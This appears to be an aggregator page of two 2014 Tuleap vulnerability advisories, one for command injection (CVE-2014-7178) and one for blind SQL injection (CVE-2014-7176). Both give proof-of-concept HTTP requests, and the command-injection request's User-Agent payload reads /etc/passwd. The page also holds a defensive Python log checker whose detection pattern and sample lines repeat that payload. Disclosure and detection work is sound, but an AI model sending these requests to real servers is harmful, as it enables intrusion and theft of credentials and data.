| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2014-7176 | 28 Oct 2014 00:00 | – | circl |
| CVE-2014-7178 | 28 Oct 2014 00:00 | – | circl |
| CVE-2014-7176 | 4 Nov 2014 15:00 | – | cve |
| CVE-2014-7178 | 28 Nov 2014 15:00 | – | cve |
| CVE-2014-7176 | 4 Nov 2014 15:00 | – | cvelist |
| CVE-2014-7178 | 28 Nov 2014 15:00 | – | cvelist |
| Enalean Tuleap 7.4.99.5 - Blind SQL Injection | 28 Oct 2014 00:00 | – | exploitdb |
| Enalean Tuleap 7.4.99.5 - Remote Command Execution | 28 Oct 2014 00:00 | – | exploitdb |
| Enalean Tuleap 7.4.99.5 - Remote Command Execution | 28 Oct 2014 00:00 | – | exploitpack |
| Enalean Tuleap 7.4.99.5 - Blind SQL Injection | 28 Oct 2014 00:00 | – | exploitpack |

Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
Details:
Tuleap does not validate the syntax of requests submitted to the SVN handler pages, so it does not check whether a request passed to the passthru() function introduces extra parameters that would be executed in the context of the application.
External attackers can exploit this vulnerability to introduce external commands into the workflow of the application, which then executes them, as shown in the proof-of-concept request below.
After registering with the application, sending a request similar to the one below triggers the vulnerability:
GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
Host: [IP]
User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[IP]/svn/?group_id=102
Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
Connection: keep-alive
Cache-Control: max-age=0
Note: In order to exploit this vulnerability, a user needs to be in a position to see the SVN repository.
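
A log check for the request pattern described above, as an added example that is not part of the original advisory: it scans Apache combined-format access logs for requests under /svn/ whose User-Agent carries shell control syntax. The log lines, IP addresses, host name and the choice of the /svn/ prefix as scope are constructed assumptions.

```python
import re

# Apache "combined" log format; quoted fields may hold backslash escapes such as \".
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<uri>\S+)[^"]*" \d{3} \S+ '
    r'"(?:[^"\\]|\\.)*" "(?P<ua>(?:[^"\\]|\\.)*)"'
)
# Shell control syntax that a browser User-Agent has no reason to carry. ';', '(' and
# ')' are left out on purpose because ordinary User-Agent strings contain them.
SHELL_SYNTAX = re.compile(r'&&|\|\||[|`<>"]|\$\(|\$\{')
ESCAPES = {"n": "\n", "t": "\t"}

def unescape(field):
    # Undo log escaping: backslash + char (Apache) and \xHH (Apache, nginx).
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return ESCAPES.get(m.group(2), m.group(2))
    return re.sub(r'\\(?:x([0-9A-Fa-f]{2})|(.))', repl, field)

def suspicious_svn_requests(lines, prefix="/svn/"):
    """Return requests under `prefix` whose User-Agent contains shell syntax."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m["uri"].startswith(prefix):
            continue
        ua = unescape(m["ua"])
        tokens = sorted(set(SHELL_SYNTAX.findall(ua)))
        if tokens:
            hits.append({"ip": m["ip"], "time": m["ts"], "uri": m["uri"],
                         "tokens": tokens, "user_agent": ua})
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical host name).
SAMPLE_LOG = [
    # Ordinary browser request to the SVN viewer.
    r'192.0.2.10 - alice [28/Oct/2014:10:01:02 +0000] "GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1" 200 5120 "https://tuleap.example/svn/?group_id=102" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0"',
    # User-Agent shaped like the advisory's request, as Apache would log it.
    r'198.51.100.7 - - [28/Oct/2014:10:03:44 +0000] "GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1" 200 5120 "-" "M\" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && \"ozilla/5.0"',
    # Shell syntax in the User-Agent, but outside the /svn/ scope of this check.
    r'203.0.113.5 - - [28/Oct/2014:10:05:00 +0000] "GET /plugins/docman/?group_id=100 HTTP/1.1" 200 900 "-" "x && y"',
]

if __name__ == "__main__":
    for hit in suspicious_svn_requests(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["uri"], hit["tokens"])
```

The check only sees what the log format records; the combined format keeps the User-Agent and Referer headers and no others.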
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
Details:
A SQL injection has been found and confirmed in the software, exploitable as an authenticated user. A successful attack could allow an authenticated attacker to access information stored in the database, such as usernames and password hashes. The following URLs and parameters have been confirmed to be vulnerable to SQL injection:
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
Note: In order to exploit this vulnerability, an attacker needs to be in a position to access the '/plugins/docman/' URN.
# 0day.today [2018-01-01] #